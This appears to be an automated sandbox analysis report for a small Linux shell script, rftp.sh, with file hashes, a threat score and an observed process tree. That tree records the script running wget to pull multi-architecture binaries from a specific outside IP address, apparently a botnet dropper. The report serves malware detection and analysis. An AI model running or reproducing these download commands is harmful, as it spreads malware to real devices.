Overview

overview

7

Static

static

tmp/bluarm

debian-9-armhf

tmp/blui686

ubuntu-18.04-amd64

tmp/blumips

debian-9-mips

tmp/blumips64

debian-9-mips

tmp/blumipsel

debian-9-mipsel

tmp/bluppc

ubuntu-18.04-amd64

tmp/bluppc

debian-9-armhf

tmp/bluppc

debian-9-mips

tmp/bluppc

debian-9-mipsel

tmp/blush

ubuntu-18.04-amd64

tmp/blush

debian-9-armhf

tmp/blush

debian-9-mips

tmp/blush

debian-9-mipsel

tmp/blux86

ubuntu-18.04-amd64

7

tmp/rftp.sh

ubuntu-18.04-amd64

5

tmp/rftp.sh

debian-9-armhf

5

tmp/rftp.sh

debian-9-mips

5

tmp/rftp.sh

debian-9-mipsel

5

Analysis

  • max time kernel
    0s
  • max time network
    153s
  • platform
    linux_mipsel
  • resource
    debian9-mipsel-en-20211208
  • resource tags

    arch:mipselimage:debian9-mipsel-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    03-10-2022 01:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tmp/rftp.sh

  • Size

    543B

  • MD5

    14dcef3dd4cc163cda3acafdce3e1855

  • SHA1

    2fa79835d19bb0021fa3687b21d05600f2dbef95

  • SHA256

    c20d42369a607ef0dd0853b7cb9e633a5fa874b2403fb8bcd020f167a5466e67

  • SHA512

    dc845248446f25e6558d295191aad2a5a2c433b3dc711e12812a258b08381fa167f3c45fe125385f5068acab3ae751bf67ab96d8664c008a02083ab5fde90e42

Score
5/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tmp/rftp.sh
    /tmp/tmp/rftp.sh
    1⤵
    • Writes file to tmp directory
    PID:325
    • /usr/bin/wget
      wget http://93.174.93.187/blumips
      2⤵
        PID:326
      • /usr/bin/wget
        wget http://93.174.93.187/blumips64
        2⤵
          PID:331
        • /usr/bin/wget
          wget http://93.174.93.187/blumipsel
          2⤵
            PID:332
          • /usr/bin/wget
            wget http://93.174.93.187/bluarm
            2⤵
              PID:333
            • /usr/bin/wget
              wget http://93.174.93.187/blush
              2⤵
                PID:334
              • /usr/bin/wget
                wget http://93.174.93.187/bluppc
                2⤵
                  PID:335
                • /usr/bin/wget
                  wget http://93.174.93.187/blui686
                  2⤵
                    PID:336
                  • /usr/bin/wget
                    wget http://93.174.93.187/blux86
                    2⤵
                      PID:337

                  Network

                  MITRE ATT&CK Matrix

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads